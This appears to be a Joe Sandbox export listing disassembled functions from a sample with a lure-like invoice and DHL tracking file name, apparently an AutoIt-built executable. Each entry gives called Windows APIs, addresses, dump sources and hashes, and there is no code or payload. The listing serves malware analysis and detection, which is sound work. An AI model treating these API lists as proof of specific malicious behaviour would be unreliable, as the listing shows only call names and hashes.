Instruction ID: bde655c877d2c08a540512c5fbf9159b657977c32e8b628f088c8e44422960a5
Opcode Fuzzy Hash: 1a522003fa8669d509f293f71d3ce78c7a9fdbd6614cce04aed6fde4746875c8
Instruction Fuzzy Hash: D30167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5AC64CBE5

Function 0046EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0046EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0046EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046EB75

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 006adf219d05379228fd92673f0820b1abaf0f8004913cab913325fb14eb15e3
Instruction ID: f5e88bd126d4b4a45c055c34ca32b052b60c6e081341237e67be9e8f7f9e4ade
Opcode Fuzzy Hash: 006adf219d05379228fd92673f0820b1abaf0f8004913cab913325fb14eb15e3
Instruction Fuzzy Hash: 55F03072140158BBE72157529C4EEEF3A7CEFDAB11F00017AF601D1191D7A05E01CABD

Function 00457439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00457452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00457469
GetWindowDC.USER32(?), ref: 00457475
GetPixel.GDI32(00000000,?,?), ref: 00457484
ReleaseDC.USER32(?,00000000), ref: 00457496
GetSysColor.USER32(00000005), ref: 004574B0

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 13767dde9905c331695c021f44ed15c71d7cf84250aa2b4c85453f6a2abbb232
Instruction ID: 6ab9d80463e99b87d734b7b9dcd57c73bb02452364882ca98cfe7d1e246d3b82
Opcode Fuzzy Hash: 13767dde9905c331695c021f44ed15c71d7cf84250aa2b4c85453f6a2abbb232
Instruction Fuzzy Hash: CB018B31400215FFEB105FA4EC48BAA7BB5FB14322F510072FD16A21A1CB311E42AB59

Function 00461874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0046187F
UnloadUserProfile.USERENV(?,?), ref: 0046188B
CloseHandle.KERNEL32(?), ref: 00461894
CloseHandle.KERNEL32(?), ref: 0046189C
GetProcessHeap.KERNEL32(00000000,?), ref: 004618A5
HeapFree.KERNEL32(00000000), ref: 004618AC

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 43ec2971e1f8e2b585ea47eb38944aec25349c450572c3fa8a85bc44f1bb437f
Instruction ID: 93ed99ab83d3086ca9a7d7f977fc2ab570087ad659e0d6fe9bbd6d734ea77bf3
Opcode Fuzzy Hash: 43ec2971e1f8e2b585ea47eb38944aec25349c450572c3fa8a85bc44f1bb437f
Instruction Fuzzy Hash: B6E0E536004101BBDB016FA1EE4D90ABF39FFA9B22B108232F22581070CB329420DF68

Function 0040BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040BEB3

Strings

D%M, xrefs: 0040BE9A
D%MD%M, xrefs: 0040BCA5
D%M, xrefs: 0040BCA2
D%M, xrefs: 0040BDED, 0040BD91, 0040BD1B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%M$D%M$D%M$D%MD%M
API String ID: 1385522511-4071987705
Opcode ID: 45be36f2c31fd68d13b3661d6e4058314b6040ef6306753e818845e7dda3d8e9
Instruction ID: b7ac573a61b6c86a4bc46bfd2286d2af8bebba7c614699f93cceb1e50d544b9f
Opcode Fuzzy Hash: 45be36f2c31fd68d13b3661d6e4058314b6040ef6306753e818845e7dda3d8e9
Instruction Fuzzy Hash: 94915A75A04206DFCB14CF58C090AAAB7F1FF59310B24816FD945AB390D779AD82CBD8

Function 00487B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00420242: EnterCriticalSection.KERNEL32(004D070C,004D1884,?,?,0041198B,004D2518,?,?,?,004012F9,00000000), ref: 0042024D
Part of subcall function 00420242: LeaveCriticalSection.KERNEL32(004D070C,?,0041198B,004D2518,?,?,?,004012F9,00000000), ref: 0042028A

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

Part of subcall function 004200A3: __onexit.LIBCMT ref: 004200A9

__Init_thread_footer.LIBCMT ref: 00487BFB

Part of subcall function 004201F8: EnterCriticalSection.KERNEL32(004D070C,?,?,00418747,004D2514), ref: 00420202
Part of subcall function 004201F8: LeaveCriticalSection.KERNEL32(004D070C,?,00418747,004D2514), ref: 00420235

Strings

5, xrefs: 00487C78
+TE, xrefs: 00487E2E
G, xrefs: 00487C7F
Variable must be of type 'Object'., xrefs: 00487C3A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +TE$5$G$Variable must be of type 'Object'.
API String ID: 535116098-3584180923
Opcode ID: 61b466c14dfb940eef884533cbb4b5b3314c8a87026b490e5ab9facc96b5f4a2
Instruction ID: 0825d4067c9ae755b982dfb175b1a2eaf4d05ac682f8bd9bb84b6976c6d4baab
Opcode Fuzzy Hash: 61b466c14dfb940eef884533cbb4b5b3314c8a87026b490e5ab9facc96b5f4a2
Instruction Fuzzy Hash: 60916E70604209EFCB14EF55D8A19AEB7B2BF44304F24845EF805AB392DB79EE41CB59

Function 0046C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407620: _wcslen.LIBCMT ref: 00407625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0046C6EE
_wcslen.LIBCMT ref: 0046C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0046C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0046C7CA

Strings

0, xrefs: 0046C6AF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 05698d32134d5ed1081ea2a04b4bc6ecc20893da183934df637c20565854ea89
Instruction ID: 02c39af64d605911332feec9c2f910ed825ee2d27519ab025def179ed8ccc1ac
Opcode Fuzzy Hash: 05698d32134d5ed1081ea2a04b4bc6ecc20893da183934df637c20565854ea89
Instruction Fuzzy Hash: E451BD71604302ABD710AF29C8C5A7B77E4AB49315F040A2FF9D5E32A0EB78D8058A5F

Function 0048AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0048AEA3

Part of subcall function 00407620: _wcslen.LIBCMT ref: 00407625

GetProcessId.KERNEL32(00000000), ref: 0048AF38
CloseHandle.KERNEL32(00000000), ref: 0048AF67

Strings

<, xrefs: 0048AE6B
@, xrefs: 0048AE72

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 3e4878397791d2b0ad18a58e04d706da771af16a5a8456b09464ed2045acdf63
Instruction ID: 3a9d9222576e1ac9a23f032ea787e2e7f4163c939ef43f311c18500ddff8749b
Opcode Fuzzy Hash: 3e4878397791d2b0ad18a58e04d706da771af16a5a8456b09464ed2045acdf63
Instruction Fuzzy Hash: FB716D71A00615DFDB14EF55C484A9EBBF0BF08318F0488AEE816AB391C778ED55CB99

Function 0046719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00467206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0046723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0046724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004672CF

Strings

DllGetClassObject, xrefs: 00467242

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: b35b2fabb8949c64e64443875823b8b72f8e25cef496698fd7594227b97294f6
Instruction ID: e332de68a8d26745d51daefcd21ff4a8066250c0fbc8ee4667deaac8a0dfb549
Opcode Fuzzy Hash: b35b2fabb8949c64e64443875823b8b72f8e25cef496698fd7594227b97294f6
Instruction Fuzzy Hash: B841AFB1604204EFDB15CF54C895B9A7BA9EF44318F1080AFFD059F20AE7B8D945CBA9

Function 00492F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00492F8D
LoadLibraryW.KERNEL32(?), ref: 00492F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00492FA9
DestroyWindow.USER32(?), ref: 00492FB1

Strings

SysAnimate32, xrefs: 00492F68

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 0b89f4972ad498b70bc2a1595c0db3748fec38cd1bba60b0f3d8d84754f06fab
Instruction ID: 722834eff0a5930c05746b20bfc6279012394e2664c96d2ac67a4f5f0b34f9ae
Opcode Fuzzy Hash: 0b89f4972ad498b70bc2a1595c0db3748fec38cd1bba60b0f3d8d84754f06fab
Instruction Fuzzy Hash: 3C219D72200205BFEF108F64DD80EBB3BB9EB59368F10063AF954D2298D7B5DC51A768

Function 00424D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00424D1E,004328E9,?,00424CBE,004328E9,004C88B8,0000000C,00424E15,004328E9,00000002), ref: 00424D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00424DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00424D1E,004328E9,?,00424CBE,004328E9,004C88B8,0000000C,00424E15,004328E9,00000002,00000000), ref: 00424DC3

Strings

mscoree.dll, xrefs: 00424D86
CorExitProcess, xrefs: 00424D98

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6173fefeb2ea5d8578249e17750bc1ca4379ae90663aaee229e0e61f51f9ce41
Instruction ID: f8f4e9972e8aaa3044dd575916bf8a37e8c474ed8185850f22b2ae15484a8ef3
Opcode Fuzzy Hash: 6173fefeb2ea5d8578249e17750bc1ca4379ae90663aaee229e0e61f51f9ce41
Instruction Fuzzy Hash: A4F04F34A50218BBDB119F91EC89BAEBBB5EF54752F4001BAF809A2260CB345D40CE98

Function 00404E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00404EDD,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404EAE
FreeLibrary.KERNEL32(00000000,?,?,00404EDD,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00404EA8
kernel32.dll, xrefs: 00404E94

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 1f0daf08137303d123905fa1aea4dff68d5910ed260024f2cdacfbd315a855e4
Instruction ID: df5f97fde00aa5c7b11bf10d08503bc6e97474995ffea749878bf06e9095efd0
Opcode Fuzzy Hash: 1f0daf08137303d123905fa1aea4dff68d5910ed260024f2cdacfbd315a855e4
Instruction Fuzzy Hash: 7CE08635A015229BD2211B25BC59B5B6554AFD1B637050137FD04E2254DB78CD0244EC

Function 00404E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00443CDE,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404E74
FreeLibrary.KERNEL32(00000000,?,?,00443CDE,?,004D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00404E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00404E6E
kernel32.dll, xrefs: 00404E5B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: bbfd422d7dd054d629010c3565ecda1d64402e91b67eb59358e1197e0cf7697b
Instruction ID: 14aa215812f609d35427a445d5e1ed10e05d1ccd2edaed2236f54676345637d1
Opcode Fuzzy Hash: bbfd422d7dd054d629010c3565ecda1d64402e91b67eb59358e1197e0cf7697b
Instruction Fuzzy Hash: A0D0C235502621678A221B24BC0DE8B2A18AFC1B21305023BBE08B2294CF38CD01C9DC

Function 0048A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0048A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0048A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0048A468
CloseHandle.KERNEL32(?), ref: 0048A63D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 4aa8b961cf7c8c97729d537c6dc630005a7dc650bf3d033bfd094493a9189ec0
Instruction ID: b8088afb9398ffb554eda8f2aa8979eea9f31ae81038faa3cf482018adcea7df
Opcode Fuzzy Hash: 4aa8b961cf7c8c97729d537c6dc630005a7dc650bf3d033bfd094493a9189ec0
Instruction Fuzzy Hash: ADA1C771604301AFE720DF15C881F2AB7E1AF44718F14882EF5599B3D2D7B4EC418B96

Function 0043BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004A3700), ref: 0043BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,004D121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0043BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,004D1270,000000FF,?,0000003F,00000000,?), ref: 0043BC36
_free.LIBCMT ref: 0043BB7F

Part of subcall function 004329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000), ref: 004329DE
Part of subcall function 004329C8: GetLastError.KERNEL32(00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000,00000000), ref: 004329F0

_free.LIBCMT ref: 0043BD4B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: d9a96ea48cdbbf13f63fef2db02cf8a3c601fb532a01f61efdb8b8ef442142ca
Instruction ID: 1486fbc8524c102181353447770aa1bc8541d8fa981ba0c70f9e98c7ed156765
Opcode Fuzzy Hash: d9a96ea48cdbbf13f63fef2db02cf8a3c601fb532a01f61efdb8b8ef442142ca
Instruction Fuzzy Hash: AC51EA71900219AFC720DFA59C81A6AB7BCEF49314F1052AFEA54E72A1DB345E41CBDC

Function 0046E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0046DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0046CF22,?), ref: 0046DDFD

Part of subcall function 0046DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0046CF22,?), ref: 0046DE16

Part of subcall function 0046E199: GetFileAttributesW.KERNEL32(?,0046CF95), ref: 0046E19A

lstrcmpiW.KERNEL32(?,?), ref: 0046E473
MoveFileW.KERNEL32(?,?), ref: 0046E4AC
_wcslen.LIBCMT ref: 0046E5EB
_wcslen.LIBCMT ref: 0046E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0046E650

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 8b7d12b8691a708a898bce109f04a875d45e2539b377ddf33cb02cb9f38f5ea5
Instruction ID: 51a687a1a71a7dd90ec3e01b8a2bce827e6d680ca17c8134330d861f6370ce1f
Opcode Fuzzy Hash: 8b7d12b8691a708a898bce109f04a875d45e2539b377ddf33cb02cb9f38f5ea5
Instruction Fuzzy Hash: B15160B25083845BC724EBA1DC819DBB3DCAF84344F40492FE68993191EE78A588876F

Function 0048B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

Part of subcall function 0048C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0048B6AE,?,?), ref: 0048C9B5
Part of subcall function 0048C998: _wcslen.LIBCMT ref: 0048C9F1
